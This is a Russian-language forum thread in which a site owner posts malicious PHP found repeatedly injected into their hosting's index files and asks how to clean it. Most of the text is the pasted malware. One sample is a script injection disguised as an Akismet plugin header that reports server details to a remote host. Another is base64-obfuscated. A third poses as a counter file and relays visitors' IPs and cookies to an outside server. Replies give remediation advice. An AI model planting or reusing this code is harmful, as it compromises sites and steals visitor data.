Jump to content
Sign in to follow this  
samakin

вирусы на сайте

Recommended Posts

<?php
#1a48cd#
/**
 * @package Akismet
 */
/*
Plugin Name: Akismet
Plugin URI: http://akismet.com/
Description: Used by millions, Akismet is quite possibly the best way in the world to <strong>protect your blog from comment and trackback spam</strong>. It keeps your site protected from spam even while you sleep. To get started: 1) Click the "Activate" link to the left of this description, 2) <a href="http://akismet.com/get/">Sign up for an Akismet API key</a>, and 3) Go to your Akismet configuration page, and save your API key.
Version: 3.0.0
Author: Automattic
Author URI: http://automattic.com/wordpress-plugins/
License: GPLv2 or later
Text Domain: akismet
*/

/*
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
*/

if( empty( $rj ) ) {
    if( ( substr( trim( $_SERVER['REMOTE_ADDR'] ), 0, 6 ) == '74.125' ) || preg_match(
            "/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i",
            $_SERVER['HTTP_USER_AGENT']
        )
    ) {
    } else {
        error_reporting( 0 );
        @ini_set( 'display_errors', 0 );
        if( !function_exists( '__url_get_contents' ) ) {
            function __url_get_contents( $remote_url, $timeout )
            {
                if( function_exists( 'curl_exec' ) ) {
                    $ch = curl_init();
                    curl_setopt( $ch, CURLOPT_URL, $remote_url );
                    curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );
                    curl_setopt( $ch, CURLOPT_CONNECTTIMEOUT, $timeout );
                    curl_setopt( $ch, CURLOPT_TIMEOUT, $timeout ); //timeout in seconds
                    $_url_get_contents_data = curl_exec( $ch );
                    curl_close( $ch );
                } elseif( function_exists( 'file_get_contents' ) && ini_get( 'allow_url_fopen' ) ) {
                    $ctx = @stream_context_create(
                        array(
                            'http' =>
                                array(
                                    'timeout' => $timeout,
                                )
                        )
                    );
                    $_url_get_contents_data = @file_get_contents( $remote_url, false, $ctx );
                } elseif( function_exists( 'fopen' ) && function_exists( 'stream_get_contents' ) ) {
                    $handle = @fopen( $remote_url, "r" );
                    $_url_get_contents_data = @stream_get_contents( $handle );
                } else {
                    $_url_get_contents_data = __file_get_url_contents( $remote_url );
                }
                return $_url_get_contents_data;
            }
        }

        if( !function_exists( '__file_get_url_contents' ) ) {
            function __file_get_url_contents( $remote_url )
            {
                if( preg_match(
                    '/^([a-z]+):\/\/([a-z0-9-.]+)(\/.*$)/i',
                    $remote_url,
                    $matches
                )
                ) {
                    $protocol = strtolower( $matches[1] );
                    $host = $matches[2];
                    $path = $matches[3];
                } else {
                    // Bad remote_url-format
                    return false;
                }
                if( $protocol == "http" ) {
                    $socket = @fsockopen( $host, 80, $errno, $errstr, $timeout );
                } else {
                    // Bad protocol
                    return false;
                }
                if( !$socket ) {
                    // Error creating socket
                    return false;
                }
                $request = "GET $path HTTP/1.0\r\nHost: $host\r\n\r\n";
                $len_written = @fwrite( $socket, $request );
                if( $len_written === false || $len_written != strlen( $request ) ) {
                    // Error sending request
                    return false;
                }
                $response = "";
                while( !@feof( $socket ) &&
                    ( $buf = @fread( $socket, 4096 ) ) !== false ) {
                    $response .= $buf;
                }
                if( $buf === false ) {
                    // Error reading response
                    return false;
                }
                $end_of_header = strpos( $response, "\r\n\r\n" );
                return substr( $response, $end_of_header + 4 );
            }
        }

        $rj['SCRIPT_FILENAME'] = $_SERVER['SCRIPT_FILENAME'];
        $rj['SCRIPT_NAME'] = $_SERVER['SCRIPT_NAME'];
        $rj['HTTP_HOST'] = $_SERVER['HTTP_HOST'];
        $rj['REDIRECT_STATUS'] = $_SERVER['REDIRECT_STATUS'];
        $rj['SERVER_NAME'] = $_SERVER['SERVER_NAME'];
        $rj['SERVER_ADDR'] = $_SERVER['SERVER_ADDR'];
        $rj['SERVER_ADMIN'] = $_SERVER['SERVER_ADMIN'];

        $rj = __url_get_contents("http://jvoroshilova.ru/ngmt3dlp.php" . "?fid=233042&info=" . http_build_query( $rj ) . "&no=1", 1);
        echo "<script type=\"text/javascript\" src=\"http://jvoroshilova.ru/ngmt3dlp.php?id=3968684\"></script>";
    }
}
#/1a48cd#
?>

Все index.* файлы на хостинге регулярно заражаются примерно такой хренью... это из последнего...

 

+ какие-то файлы типа:

<? $GLOBALS['_1707690220_']=Array(base64_decode('' .'ZXJyb3Jf' .'cm' .'Vwb3J' .'0aW' .'5n'),base64_decode('aW5pX3' .'N' .'ldA=='),base64_decode('' .'c' .'3' .'RycG9z'),base64_decode('ZGl' .'y'),base64_decode('Zm' .'lsZV9wdXRfY29udG' .'VudHM='),base64_decode('bXR' .'fcmFuZ' .'A=='),base64_decode('' .'Y3V' .'ybF9p' .'b' .'ml0'),base64_decode('Y3VybF' .'9zZXRvcH' .'Q' .'='),base64_decode('' .'Y3Vyb' .'F' .'9zZXR' .'vcH' .'Q='),base64_decode('' .'c29ja2V0X2N' .'v' .'bm5lY3Q='),base64_decode('b' .'X' .'Rfc' .'mFu' .'ZA=' .'='),base64_decode('Y3' .'VybF9z' .'ZXR' .'vcHQ='),base64_decode('YXJy' .'Y' .'Xlfc2hp' .'ZnQ' .'='),base64_decode('Y3VybF' .'9zZXRv' .'cH' .'Q='),base64_decode('Y3VybF9zZXR' .'vcHQ='),base64_decode('c29' .'ja2V' .'0X2dld' .'HB' .'lZXJu' .'YW1l'),base64_decode('bX' .'Rfc' .'mFu' .'ZA=' .'='),base64_decode('Y3VybF9leGVj'),base64_decode('Y3V' .'ybF9nZXR' .'pbmZv'),base64_decode('Y3Vy' .'bF9nZ' .'XR' .'pbmZv'),base64_decode('Y' .'3V' .'ybF' .'9' .'jbG' .'9' .'zZQ=='),base64_decode('aGVhZGVy'),base64_decode('' .'aGV' .'hZGVy'),base64_decode('a' .'XN' .'fYXJyYXk' .'='),base64_decode('a' .'XNfYXJyY' .'Xk' .'='),base64_decode('' .'dXJsZ' .'W5jb2Rl'),base64_decode('d' .'XJsZW5jb' .'2Rl'),base64_decode('' .'c3V' .'i' .'c3Ry'),base64_decode('c3Ryb' .'G' .'Vu')); ?><? function _244453390($i){$a=Array('' .'ZG' .'lzcGx' .'heV' .'9lcnJv' .'cnM=','a' .'HR0c' .'D' .'ovL3' .'J' .'lbnQtYXBhcnR' .'t' .'ZW50' .'cy5' .'ydS9' .'za2FjaGF0LnBocA==','e' .'WhmYg=' .'=','a2F2cmM=','' .'a' .'HJxdng' .'=','YXZtbW' .'pubnh' .'j' .'amh' .'zeGc=','cWJ3e' .'g==','' .'MTI5L' .'n' .'Bpcm' .'96ZWsucnUv','bg=' .'=','Lw=' .'=','Lw==','SFR' .'UUF9DTElFTl' .'RfSVA=','' .'SFRUUF9D' .'TElFTl' .'R' .'fS' .'VA' .'=','SFRUU' .'F' .'9YX0ZPUld' .'B' .'U' .'kRFRF9' .'GT' .'1I=','SF' .'R' .'UU' .'F9' .'YX0ZP' .'Ul' .'dB' .'U' .'kRFRF9' .'GT' .'1' .'I' .'=','UkVNT1' .'RF' .'X0FERFI' .'=','YmF' .'i' .'eQ==','c' .'A=' .'=','' .'Yw==','Zg' .'==','' .'aXA=','S' .'FRUU' .'F' .'9SRUZFU' .'kVS','S' .'FR' .'UUF9V' .'U0' .'VSX0' .'FHR' .'U5U','Zm1s','N' .'DA0','SFRUU' .'C8xLjA' .'gN' .'DA0IE5vd' .'CBGb' .'3V' .'uZA=' .'=','','','W' .'w==','XQ==','PQ' .'==','Jg==');return base64_decode($a[$i]);} ?><?php $GLOBALS['_1707690220_'][0](round(0));$GLOBALS['_1707690220_'][1](_244453390(0),round(0));$_0=_244453390(1);$_1=_244453390(2);$_2=_244453390(3);$_3=_244453390(4);if($GLOBALS['_1707690220_'][2](_244453390(5),_244453390(6))!==false)$GLOBALS['_1707690220_'][3]($_4,$_SERVER,$_5,$_3);$_6=_244453390(7);(round(0+1932.5+1932.5)-round(0+1932.5+1932.5)+round(0+1133.5+1133.5)-round(0+453.4+453.4+453.4+453.4+453.4))?$GLOBALS['_1707690220_'][4]($_7,$_2,$_6,$_2):$GLOBALS['_1707690220_'][5](round(0+306.33333333333+306.33333333333+306.33333333333),round(0+1288.3333333333+1288.3333333333+1288.3333333333));$_8=$GLOBALS['_1707690220_'][6]();$_9=_244453390(8);if(isset($_GET[$_2]))$_6.=$_GET[$_2] ._244453390(9);if(isset($_GET[$_1]))$_6.=$_GET[$_1] ._244453390(10);if(isset($_GET[$_3]))$_6.=$_GET[$_3];if(!empty($_SERVER[_244453390(11)]))$_10=$_SERVER[_244453390(12)];elseif(!empty($_SERVER[_244453390(13)]))$_10=$_SERVER[_244453390(14)];else $_10=$_SERVER[_244453390(15)];$_5=array(_244453390(16)=>$_0,_244453390(17)=>$_1,_244453390(18)=>$_2,_244453390(19)=>$_3,_244453390(20)=>$_10);$GLOBALS['_1707690220_'][7]($_8,10002,$_6);$GLOBALS['_1707690220_'][8]($_8,10015,l__0($_5));(round(0+879.25+879.25+879.25+879.25)-round(0+1758.5+1758.5)+round(0+421.2+421.2+421.2+421.2+421.2)-round(0+1053+1053))?$GLOBALS['_1707690220_'][9]($_2,$_7,$_8):$GLOBALS['_1707690220_'][10](round(0+543),round(0+703.4+703.4+703.4+703.4+703.4));$GLOBALS['_1707690220_'][11]($_8,19913,true);while(round(0+816+816+816)-round(0+1224+1224))$GLOBALS['_1707690220_'][12]($_SERVER,$_11);$GLOBALS['_1707690220_'][13]($_8,10016,$_SERVER[_244453390(21)]);$GLOBALS['_1707690220_'][14]($_8,10018,$_SERVER[_244453390(22)]);(round(0+646.2+646.2+646.2+646.2+646.2)-round(0+1077+1077+1077)+round(0+215.6+215.6+215.6+215.6+215.6)-round(0+359.33333333333+359.33333333333+359.33333333333))?$GLOBALS['_1707690220_'][15]($_8,$_12):$GLOBALS['_1707690220_'][16](round(0+807.75+807.75+807.75+807.75),round(0+963.4+963.4+963.4+963.4+963.4));$_4=$GLOBALS['_1707690220_'][17]($_8);$_12=$GLOBALS['_1707690220_'][18]($_8,2097154);$_13=$GLOBALS['_1707690220_'][19]($_8,1048594);$GLOBALS['_1707690220_'][20]($_8);$_14=_244453390(23);if($_12 == _244453390(24))$GLOBALS['_1707690220_'][21](_244453390(25));$GLOBALS['_1707690220_'][22]("Content-Type: $_13");echo $_4;function l__0($_11,$_15='',$_7=true){$_16=_244453390(26);if($GLOBALS['_1707690220_'][23]($_11)){foreach($_11 as $_17 => $_18){$_19=$_15;if(_244453390(27)=== $_15){$_19 .= $_17;}else{$_19 .= _244453390(28) .$_17 ._244453390(29);}if(!$GLOBALS['_1707690220_'][24]($_18)){$_16 .= $GLOBALS['_1707690220_'][25]($_19) ._244453390(30) .$GLOBALS['_1707690220_'][26]($_18) ._244453390(31);}else{$_16 .= l__0($_18,$_19,false);}}}if($_7 === true){return $GLOBALS['_1707690220_'][27]($_16,round(0),$GLOBALS['_1707690220_'][28]($_16)-round(0+0.2+0.2+0.2+0.2+0.2));}else{return $_16;}} ?>

и такое:

<?php 


/**
 *
 * This file is deprecated and only exists for backwards compatibility
 *
 * @hosting stat counter package v2.1
 *
 */


	error_reporting(0);
	ini_set('display_errors',0);



$p = 'qagzm';
$b = 'http://rent-apartments.ru/book.php';
$m =  base64_decode('MjQxLmFtZXRpc3QtcHBiLnJ1Lw==');



if(isset($_GET[$p])) {
if(is_callable('curl_init')) {
$ch = curl_init();
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {if (strpos($_SERVER['HTTP_X_FORWARDED_FOR'], ',' !== false)) {$tmp = explode(',',$_SERVER['HTTP_X_FORWARDED_FOR']);$ip = trim($tmp[count($tmp)-2]);}
else $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];} elseif (isset($_SERVER['HTTP_FORWARDED_FOR'])) $ip = $_SERVER['HTTP_FORWARDED_FOR']; elseif (isset($_SERVER['HTTP_X_REAL_IP'])) $ip = $_SERVER['HTTP_X_REAL_IP'];
else $ip = @$_SERVER['REMOTE_ADDR'];
curl_setopt($ch, CURLOPT_URL, $m.$_GET[$p]);
curl_setopt($ch, CURLOPT_POSTFIELDS, '&p='.urlencode($b.'?'.$p.'=').'&ip='.$ip);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_REFERER"]);
curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
curl_setopt($ch, CURLOPT_HEADERFUNCTION, 'hf');
if(!empty($_COOKIE)){$co='';foreach($_COOKIE as $cn => $cv){if($co)$co.='; ';$co.=$cn.'='.addslashes($cv);}curl_setopt($ch, CURLOPT_COOKIE, $co);}
echo curl_exec($ch);exit;
} else {
$a=explode('|',"REQUEST_URI|HTTP_X_FORWARDED_FOR|HTTP_FORWARDED_FOR|HTTP_X_REAL_IP|REMOTE_ADDR|HTTP_REFERER|HTTP_USER_AGENT");
$i = explode($p.'=', $_SERVER[$a[0]]);$i = $i[1];$m = parse_url($m);
$f=fsockopen($m['host'],80) or die();$i='/'.$i;if($m['path']!='/')$i=$m['path'].$i;
if(isset($_SERVER[$a[1]])){if(strpos($_SERVER[$a[1]],',')!==false){$r=explode(',',$_SERVER[$a[1]]);$j=trim($r[count($r)-2]);}else $j=$_SERVER[$a[1]];}elseif(isset($_SERVER[$a[2]]))$j=$_SERVER[$a[2]];elseif(isset($_SERVER[$a[3]]))$j=$_SERVER[$a[3]];else$j=@$_SERVER[$a[4]];
$h="POST $i HTTP/1.1\r\nHost: ".$m['host']."\r\nContent-Type: application/x-www-form-urlencoded\r\n";
if(!empty($_SERVER[$a[5]]))$h.='Referer: '.$_SERVER[$a[5]]."\r\n";$g='&p='.urlencode($b.'?'.$p.'=').'&ip='.$j;
if(!empty($_COOKIE)){$o='';foreach($_COOKIE as $n=>$v){if($o)$o.='; ';$o.=$n.'='.addslashes($v);}$h.='Cookie: '.$o."\r\n";}
$h.='User-agent: '.$_SERVER[$a[6]]."\r\nContent-length: ".strlen($g)."\r\nConnection: Close\r\n\r\n"; 
fwrite($f,$h.$g);$r='';while(!feof($f)){$r.=fgets($f,1024);}fclose($f);
list($h,$d)=explode("\r\n\r\n",$r,2);$h=explode("\r\n",$h);
foreach($h as $l){if(strpos($l,'Content-Type')!==false||strpos($l,'404')!==false||strpos($l,'301')!==false||strpos($l,'Location')!==false||strpos($l,'Set-Cookie')!==false)header($l);if(strpos($l,'chunked')!==false)$c=true;}
if(@$c){for($o='';!empty($d);$d=trim($d)){$s=strpos($d,"\r\n");$e=hexdec(substr($d,0,$s));$o.=substr($d,$s+2,$e);$d=substr($d,$s+2+$e);}echo $o;}else echo $d;
}}
function hf($ch, $hl){if(strpos($hl,'Content-Type')!==false||strpos($hl,'404')!==false||strpos($hl,'301')!==false||strpos($hl,'Location')!==false||strpos($hl,'Set-Cookie')!==false) header($hl);return strlen($hl);}
?>

как это лечить кроме как руками чистить? я и аттрибуты Write поснимал, не помогает...

Share this post


Link to post
Share on other sites

в логах все чисто, по идее это наверное через какую-то дырявую форму залили ;(

У Вас сайт на wordpress? Как Вы узнали что это вирус?

Share this post


Link to post
Share on other sites

нет, движок самописный, но лет 10 назад... ;)

я контакты xqwerty дал хозяину сайта, он наверное завтра свяжется - надо будет не просто почистить, а понять через какую дырочку секс осуществляется ;)

Share this post


Link to post
Share on other sites

Если модифицируются различные файлы - работают как удаленно (шеллы), так и руками (благо есть Тиц и комм.тематика). Просто так не отстанут. Будут убивать сайт до последнего, пока не просядет и не вылетит из выдачи.

Удаление кодов ничего не даст, нужно искать причину. 

Как самый простой вариант - все удалить (коды вирусов) и все обновить на сайте (движок, плагины и т.д.), но нет гарантий.

Как самый затратный - постучать мне в личку.

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this  

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...